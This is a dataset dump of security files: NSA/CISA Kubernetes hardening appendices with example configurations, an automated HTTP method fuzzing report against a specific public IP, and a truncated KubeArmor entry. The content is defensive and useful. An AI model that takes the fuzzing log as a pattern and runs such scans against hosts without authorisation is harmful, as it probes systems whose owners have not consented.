\nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nUpgrading and application security practices \nFollowing the hardening guidance outlined in this document is a step toward ensuring \nthe security of applications running on Kubernetes orchestrated containers. However, \nsecurity is an ongoing process , and it is vital to keep up with patches, updates, and \nupgrades. The specific software components vary depending on the individual \nconfiguration, but each piece of the overall system should be kept as secure as \npossible. This includes updating : Kubernetes, hypervisors, virtualization software, \nplugins, operating systems on which the environment is running, applications running on \nthe servers, and any other software hosted in the Kubernetes environment. \nThe Center for Internet Security (CIS) publishes bench marks for securing software. \nAdministrators should adhere to the CIS benchmarks for Kubernetes and any other \nrelevant system components. Administrators should check periodically to ensure their \nsystem 's security is compliant with the current security exper ts\u2019 consensus on best \npractices. Periodic vulnerability scans and penetration tests should be performed on the \nvarious system components to proactively look for insecure configurations and zero-day \nvulnerabilities. Any discoveries should be promptly remedi ated before potential cyber \nactors can discover and exploit them. \nAs updates are deployed, administrators should also keep up with removing any old \ncomponents that are no longer needed from the environment. Using a managed \nKubernetes service can help to a utomate upgrades and patches for Kubernetes, \noperating systems, and networking protocols. However, administrators must still patch \nand upgrade their containerized applications. \n\u25b2Return to Contents \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 33 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nWorks cited \n[1] Center for Internet Security, \"Kubernetes,\" 2021. [Online]. Available: \nhttps://cisecurity.org/ resources/?type=benchmark&search=kubernetes . \n[2] DISA, \"Kubernetes STIG,\" 2021. [Online]. Available: https:/ /dl.dod.cyber.mil.wp -\ncontent/uploads/stigs/zip/ U_Kubernetes_V1R1_STIG.zip . [Accessed 8 July 2021] \n[3] The Linux Foundation, \"Kubernetes Docum entation,\" 2021. [Online]. Available: \nhttps://kubernetes.io/docs/ home /. [Accessed 8 July 2021]. \n[4] The Linux Foundation, \"11 Ways (Not) to Get Hacked,\" 18 07 2018. [Online]. \nAvailable: https://kubernetes.io/blog/2018/07/18/11 -ways -not-to-get-hacked/#10 -\nscan -images -and-run-ids. [Accessed 8 July 2021]. \n[5] MITRE, \" Unsecured Credentials: Cloud Instance Metadata API. \" MITRE ATT&CK, \n2021. [Online]. Available: htt ps://attack.mitre.org/te chniques/T1552/005/. [Accessed \n8 July 2021]. \n[6] CISA, \"Analysis Report (AR21 -013A): Strengthening Security Configurations to \nDefend Against Attackers Targeting Cloud Services. \" Cybersecurity and \nInfrastructure Security Agency, 14 January 2021. [Online ]. Available:https://us -\ncert.cisa.gov/ncas/analysis -reports/ar21 -013a [Accessed 8 July 2021]. \n \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 34 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix A: Example Dockerfile for non -root application \nThe following example is a Dockerfile that runs an application as a non -root user with \nnon-group membership. The lines highlighted in red below are the portion specific to \nusing non -root. \nFROM ubuntu:latest \n \n#Update and install the make utility \nRUN apt update && apt install -y make \n \n#Copy the source from a folder called \u201ccode\u201d and build the application with \nthe make utility \nCOPY . /code \nRUN make /code \n \n#Create a new user (user1) and new group (group1); then switch into that \nuser\u2019s context \nRUN useradd user1 && groupadd group1 \nUSER user1:group1 \n \n#Set the default entrypoint for the container \nCMD /code/app \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 35 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix B: Example deployment template for read -only file \nsystem filesystem \nThe following is an example Kubernetes deployment template that uses a read -only root \nfile system. The lines highlighted in red below are the portion specific to making the \ncontainer\u2019s filesystem read -only. The lines highlighted in blue are the portion showing \nhow to create a writeable volume for applications requiring this capability. \napiVersion: apps/v1 \nkind: Deployment \nmetadata : \n labels: \n app: web \n name: web \nspec: \n selector: \n matchLabels: \n app: web \n template: \n metadata: \n labels: \n app: web \n name: web \n spec: \n containers: \n - command: [\"sleep\"] \n args: [\"999\"] \n image: ubuntu:latest \n name: web \n securityContext: \n readOnlyRootFilesystem: true \n volumeMounts: \n - mountPath: /writeable/location/here \n name: volName \n volumes: \n - emptyDir: {} \n name: volName \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 36 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix C: Example Pod Security Policy \nThe following is an example Kubernetes Pod Security Policy that enforces strong \nsecurity requirements for containers running in the cluster. This example is based on \nofficial Kubernetes documentation: https://kubernetes.io/docs/concepts/policy/pod -\nsecurity -policy/ . Administrators are encouraged to tailor the policy to meet their \norganization\u2019s requirements. \napiVersion: pol icy/v1beta1 \nkind: PodSecurityPolicy \nmetadata: \n name: restricted \n annotations: \n seccomp.security.alpha.kubernetes.io/allowedProfileNames: \n'docker/default,runtime/default' \n apparmor.security.beta.kubernetes.io/allowedProfileNames: \n'runtime/default' \n seccomp.security.alpha.kubernetes.io/defaultProfileName: \n'runtime/default' \n apparmor.security.beta.kubernetes.io/defaultProfileName: \n'runtime/default' \nspec: \n privileged: false # Required to prevent escalations to root. \n allowPrivilegeEscalation: false \n requiredDropCapabilities: \n - ALL \n volumes: \n - 'configMap' \n - 'emptyDir' \n - 'projected' \n - 'secret' \n - 'downwardAPI' \n - 'persistentVolumeClaim' # Assume persistentVolumes set up by admin \nare safe \n hostNetwork: false \n hostIPC: false \n hostPID: false \n runAsUser: \n rule: 'MustRunAsNonRoot' # Require the container to run without root \n seLinux: \n rule: 'RunAsAny' # This assumes nodes are using AppArmor rather than \nSELinux \n supplementalGroups: \n rule: 'MustRunAs' \n ranges: # Forbid adding the root group. \n - min: 1 \n max: 65535 \n runAsGroup: \n rule: 'MustRunAs' \n ranges: # Forbid adding the root group. \n - min: 1 \n max: 65535 \n fsGroup: \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 37 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n rule: 'MustRunAs' \n ranges: # Forbid adding the root group. \n - min: 1 \n max: 65535 \n readOnlyRootFilesystem: true \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 38 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix D: Example namespace \nThe following example is for each team or group of users, a Kubernetes namespace \ncan be created using either a kubectl command or YAML file. Any name with the \nprefix kube- should be avoided as it may conflict with Kubernetes system reserved \nnamespaces. \nKubectl command to create a namespace : \nkubectl create namespac e <insert -namespace -name-here> \nTo create namespace using YAML file, create a new file called my-namespace.yaml \nwith the contents: \napiVersion: v1 \nkind: Namespace \nmetadata: \n name: <insert -namespace -name-here> \n \nApply the namespace using : \nkubectl create \u2013f ./my-namespace.yaml \nTo create new Pods in an existing namespace, switch to the desired namespace using: \nkubectl config use -context <insert -namespace -here> \nApply new deployment using: \nkubectl apply -f deployment.yaml \nAlternatively, the namespace can be adde d to the kubectl command using: \nkubectl apply -f deployment.yaml --namespace=<insert -namespace -here> \nor specify namespace: <insert -namespace -here> under metadata in the YAML \ndeclaration. \nOnce created, resources cannot be moved between namespaces. The resou rce must \nbe deleted, then created in the new namespace. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 39 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix E: Example network policy \nNetwork policies differ depending on the network plugin used. The following is an \nexample network policy to limit access to the nginx service to Pods with the label \naccess using the Kubernetes documentation : \nhttps://kubernetes.io/docs/tasks/administer -cluster/declare -network -policy/ \napiVersion: networking.k8s.io/v1 \nkind: NetworkPolicy \nmetadata: \n name: example -access-nginx \n namespace: prod #this can any namespace or be left out if no \nnamespace is used \nspec: \n podSelector: \n matchLabels: \n app: nginx \n ingress: \n -from: \n -podSelector: \n matchLabels: \n access: \u201ctrue\u201d \n \nThe new NetworkPolicy can be applied using: \nkubectl apply -f policy.yaml \nA default deny all ingress policy: \napiVersion: networking.k8s.io/v1 \nkind: NetworkPolicy \nmetadata: \n name: deny -all-ingress \nspec: \n podSelector: {} \n policyType: \n - Ingress \n \nA default deny all egress policy: \napiVersion: networking.k8s.io/v1 \nkind: NetworkPolicy \nmetadata: \n name: deny -all-egress \nspec: \n podSelector: {} \n policyType: \n - Egress \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 40 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix F: Example LimitRange \nLimitRange support is enabled by default in Kubernetes 1.10 and newer. The following \nYAML file specifies a LimitRange with a default request and limit , as well as a min and \nmax request , for each container . \napiVersion: v1 \nkind: LimitRange \nmetadata: \n name: cpu -min-max-demo-lr \nspec: \n limits \n - default: \n cpu: 1 \n defaultRequest: \n cpu: 0.5 \n max: \n cpu: 2 \n min: \n cpu 0.5 \n type: Container \n \nA LimitRange can be applied to a namespace with: \nkubectl apply -f <example -LimitRange>.yaml --namespace=<Enter -Namespace> \n \nAfter this example LimitRange configuration is applied , all containers created in the \nnamespace are assigned the default CPU request and limit if not specified. All \ncontainers in the namespace must h ave a CPU request greater than or equal to the \nminimum value and less than or equal to the maximum CPU value or the container will \nnot be instantiated . \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 41 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix G: Example ResourceQuota \nResourceQuota objects to limit aggregate resource usage within a namespace are \ncreated by applying a YAML file to a namespace or specifying requirements in the \nconfiguration file of Pods. The following example is based on official Kubernetes \ndocumentation: https://kubernetes.io/docs/tasks/administer -cluster/manage -\nresources/quota -memory -cpu-namespace/ \nConfiguration file for a namespace: \napiVersion: v1 \nkind: ResourceQuota \nmetadata: \n name: example -cpu-mem-resourcequota \nspec: \n hard: \n requests.cpu: \u201c1\u201d \n requests.memory: 1Gi \n limits.cpu: \u201c2\u201d \n limits.memory: 2Gi \n \nThis ResourceQuota can be applied with: \nkubectl apply -f example -cpu-mem-resourcequota.yaml --\nnamespace=<insert -namespace -here> \nThis ResourceQuota places the following constraints on the chosen namespace: \n\uf0b7 Every container must have a memory request, memory limit, CPU request, and \nCPU limit \n\uf0b7 Aggregate m emory request for all containers should not exceed 1 GiB \n\uf0b7 Total m emory limit for all containers should not exceed 2 GiB \n\uf0b7 Aggregate CPU request for all containers should not exceed 1 CPU \n\uf0b7 Total CPU limit for all containers should not exceed 2 CPUs \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 42 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix H: Example encryption \nTo encrypt Secret data at rest, the following encryption configuration file provides an \nexample to specify the type of encryption desired and the encryption key. Storing the \nencryption key in the encryption file only slightly improves security. The Secrets will be \nencrypted, but the key will be accessible in the EncryptionConfigu ration file. This \nexample is based on official Kubernetes documentation: \nhttps://kubernetes.io/docs/tasks/administer -cluster/encrypt -data/ . \napiVersion: apiserver.config.k8s.i o/v1 \nkind: EncryptionConfiguration \nresources: \n - resources: \n - secrets \n providers: \n - aescbc: \n keys: \n - name: key1 \n secret: <base 64 encoded secret> \n - identity: {} \n \nTo enable encryption at rest with this encryption file, restart the API server with the --encryption -\nprovider -config flag set with the location to the config uration file. \n \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 43 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix I: Example KMS configuration \nTo encrypt Secrets with a Key Management Service (KMS) provider plugin, the \nfollowing example encryption configuration YAML file can be used to set the properties \nfor the provider. This example is based on official Kubernetes documentation: \nhttps://kubernetes.io/docs/tasks/administer -cluster/kms -provider/ . \napiVersion: apiserver.config.k8s.io/v1 \nkind: EncryptionConfiguration \nresources: \n - resources: \n - secrets \n providers: \n - kms: \n name: myKMSPlugin \n endpoint: unix://tmp/socketfile.sock \n cachesize: 100 \n timeout: 3s \n - identity: {} \n \nTo configure the API server to use the KMS provider, set the --encryption -\nprovider -config flag with the location of the configuration file and restart the API \nserver. \nTo switch from a local encryption provider to KMS, add the KMS provider section of the \nEncryptionConfiguration file above the current encryption method , as shown below. \napiVersi on: apiserver.config.k8s.io/v1 \nkind: EncryptionConfiguration \nresources: \n - resources: \n - secrets \n providers: \n - kms: \n name: myKMSPlugin \n endpoint: unix://tmp/socketfile.sock \n cachesize: 100 \n timeout: 3s \n - aescbc: \n keys: \n - name: key1 \n secret: <base64 encoded secret> \n \nRestart the API server and run the command below to re -encrypt all Secrets with the \nKMS provider. \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 44 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nkubectl get secrets --all-namespaces -o json | kubectl replace -f - \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 45 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix J: Example pod -reader RBAC Role \nTo create a pod -reader Role , create a YAML file with the following contents: \napiVersion: rbac.authorization.k8s.io/v1 \nkind: Role \nmetadata: \n namespace: your -namespace -name \n name: pod-reader \nrules: \n- apiGroups: [\u201c\u201d] # \u201c\u201d indicates the core API group \n resources: [\u201cpods\u201d] \n verbs: [\u201cget\u201d, \u201cwatch\u201d, \u201clist\u201d] \n \nApply the Role using: \nkubectl apply --f role.yaml \nTo create a global -pod-reader ClusterRole: \napiVersion: rbac.authorization.k8s.io/v1 \nkind: ClusterRole \nmetadata: default \n # \u201cnamespace\u201d omitted since ClusterRoles are not bound to a \nnamespace \n name: global -pod-reader \nrules: \n- apiGroups: [\u201c\u201d] # \u201c\u201d indicates the core API group \n resources: [\u201cpods\u201d] \n verbs: [\u201cget\u201d, \u201cwatch\u201d, \u201clist\u201d] \n \nApply the Role using: \nkubectl apply --f clusterrole.yaml \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 46 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix K: Example RBAC RoleBinding and \nClusterRoleBinding \nTo create a RoleBinding, create a YAML file with the following contents: \napiVersion: rbac.authorization.k8s.io/v1 \n# This role binding allows \u201cjane\u201d to read Pods in the \u201cyour -\nnamespace -name\u201d \n# namespace. \n# You need to already have a Role names \u201cpod -reader\u201d in that \nnamespace. \nkind: RoleBinding \nmetadata: \n name: read -pods \n namespace: your -namespace -name \nsubjects: \n# You can specify more than one \u201csubject\u201d \n- kind: User \n name: jane # \u201cname\u201d is case sensitive \n apiGroup: rbac.authorization.k8s.io \nroleRef: \n # \u201croleRef\u201d specifies the binding to a Role/ClusterRole \n # kind: Role # this must be a Role or ClusterRole \n # this must match the name of the Role or ClusterRole you wish to \nbind \n # to \n name: pod -reader \n apiGroup: rbac.authorization.k8s.io \nApply the RoleBinding using: \nkubectl apply --f rolebinding.yaml \nTo create a ClusterRoleBinding, create a YAML file wi th the following contents: \napiVersion: rbac.authorization.k8s.io/v1 \n# This cluster role binging allows anyone in the \u201cmanager\u201d group to \nread \n# Pod information in any namespace. \nkind: ClusterRoleBinding \nmetadata: \n name: global -pod-reader \nsubjects: \n# You can specify more than one \u201csubject\u201d \n- kind: Group \n name: manager # Name is case sensitive \n apiGroup: rbac.authorization.k8s.io \nroleRef: \n # \u201croleRef\u201d specifies the binding to a Role/ClusterRole \n kind: ClusterRole # this must be a Role or ClusterRole \n name: global -pod-reader # this must match the name of the Role or \nClusterRole you wish to bind to \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 47 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n apiGroup: rbac.authorization.k8s.io \nApply the RoleBinding using: \nkubectl apply --f clusterrolebi nding.yaml \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 48 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix L: Audit Policy \nThe following is an Audit Policy that logs all audit events at the highest level : \napiVersion: audit.k8s.io/v1 \nkind: Policy \nrules: \n - level: RequestResponse \n # This audit policy logs all audit events at the RequestResponse \nlevel \n \nThis audit policy logs all events at the highest level. If an organization has the resources \navailable to store, parse, and examine a large number of logs, then logging all events at \nthe highest level is a good way of ensuring that , when an event oc curs, all necessary \ncontextual information is present in the logs. If resource consumption and availability is \na concern, then more logging rules can be established to lower the logging level of non -\ncritical components and routine non -privileged actions, a s long as audit requirements for \nthe system are being met. An example of how to establish these rules can be found in \nthe official Kubernetes documentation: https://kubernete s.io/docs/tasks/debug -\napplication -cluster/audit/ . \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 49 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix M: Example flags with which to submit Audit Policy \nfile to kube -apiserver \nIn the control plane , open the kube-apiserver.yaml file in a text editor. Editing the \nkube-apiserver configuration requires administrator privileges. \nsudo vi /etc/kubernetes/manifests/kube -apiserver.yaml \n \nAdd the following text to the kube-apiserver.yaml file: \n --audit-policy-file=/etc/kubernetes/policy/audit -policy.yaml \n --audit-log-path=/var/log/audit.log \n --audit-log-maxage=1825 \n \nThe audit-policy-file flag should be set with the path to the audit policy , and the \naudit-log-path flag should be set with the desired secure location for the audit logs \nto be written to. Oth er additional flags exist, such as the audit-log-maxage flag \nshown here , which stipulates the maximum number of days the logs should be kept, \nand flags for specifying the maximum number of audit log files to retain, max log file size \nin megabytes, etc. The only flags necessary to enable logging are the audit-policy-\nfile and audit-log-path flags. The other flags can be used to configure logging to \nmatch the organization\u2019s policies. \nIf a user\u2019s kube-apiserver is run as a Pod, then it is necessary to mount the volume \nand configure hostPath of the policy and log file locations for audit records to be \nretained. This can be done by adding the following sections to the kube-\napiserver.yaml file as noted in the Kuber netes documentation : \nhttps://kubernetes.io/docs/tasks/debug -application -cluster/audit/ \nvolumeMounts: \n -mountPath: /etc/kubernetes/audit -policy.yaml \n name: audit \n readOnly: true \n -mountPath: /var/log/audit.log \n name: audit -log \n readOnly: false \n \nvolumes: \n- hostPath: \n path: /etc/kubernetes/audit -policy.yaml \n type: File \nname: audit \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 50 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \n - hostPath: \n path: /var/log/audit.log \n type: FileOrCreate \nname: audit -log \n \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 51 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nAppendix N: Webhook configuration \nYAML file example : \napiVersion: v1 \nkind: Config \npreferences: {} \nclusters: \n- name: example -cluster \ncluster: \n server: http://127.0.0.1:8080 \n#web endpoint address for the log files to be sent to \n name: audit -webhook-service \n users: \n- name: example -users \nuser: \n username: example -user \n password: example -password \n contexts: \n- name: example -context \ncontext: \n cluster: example -cluster \n user: example -user \n current-context: example -context \n#source: https://dev.bitolog.com/implement -audits-webhook/ \nThe audit events sent by the webhook are sent as HTTP POST requests with the JSON \naudit events in the request body. The address specified should point to an endpoint \ncapable of accepting and parsing these audit events, whether it is a third -party service \nor an in -house configured endpoint. \nExample flags that submit webhook configuration file to kube-apiserver : \nIn the control plane edit the kube-apiserver.yaml file \n \nsudo vi /etc/kubernetes/manifests/kube -apiserver.yaml \n \nadd the following text to the kube-apiserver.yaml file \n--audit-webhook-config-file=/etc/kubernetes/policies/webhook -\npolicy.yaml \n--audit-webhook-initial-backoff=5 \n--audit-webhook-mode=batch \n--audit-webhook-batch-buffer-size=5 \n \n \n \nU/OO/168286 -21 | PP-21-1104 | August 2021 Ver. 1.0 52 \nNational \nSecurity \nAgency \nCybersecurity \nand Infrastructure \nSecurity Agency \nKubernetes Hardening Guidance \nNational \nSecurity \nAgency \nThe audit-webhook-initial-backoff flag determines how long to wait after an \ninitial failed request before retrying. The available webhook modes are batch , \nblocking , and blocking -strict . When using batch mode , it is possible to \nconfigure the maximum wait, buffe r size, and more. The official Kubernetes \ndocumentation contains more details on the other configuration options: \nhttps://kubernetes.io/docs/tasks/debug -application -cluster/a udit/ and \nhttps://kubernetes.io/docs/reference/command -line-tools -reference/kube -apiserver/ \n \n \n \n \n \n " - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "ThreatMapper", - "file_name": "Security Report for Security Test 1 2022-08-09 02_29_43.pdf" - }, - "content": [ - { - "data": "Issues report for Security Test 1\nin Project 4/Security Test Suite 1/https://137.184.10.129:443 TestCase\nSummary\nStarted at 2022-08-09 02:29:43\nTime taken 00:00:09.032\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PURGE https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest COPY https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest UNLOCK https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest LOCK https://137.184.10.129:443/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PROPFIND https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PATCH https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest TRACE https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest OPTIONS https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest HEAD https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest DELETE https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest PUT https://137.184.10.129:443/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://137.184.10.129:443\nRequest POST https://137.184.10.129:443/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" - } - ] - }, - { - "tag": { - "category": "Provisioning", - "subcategory": "Security & Compliance", - "project_name": "KubeArmor", - "file_name": "kubearmorpolicy-spec-diagram.pdf" - }, - "content": [ - { - "data": "NFUBEBUBname: [policy name]namespace: [namespace 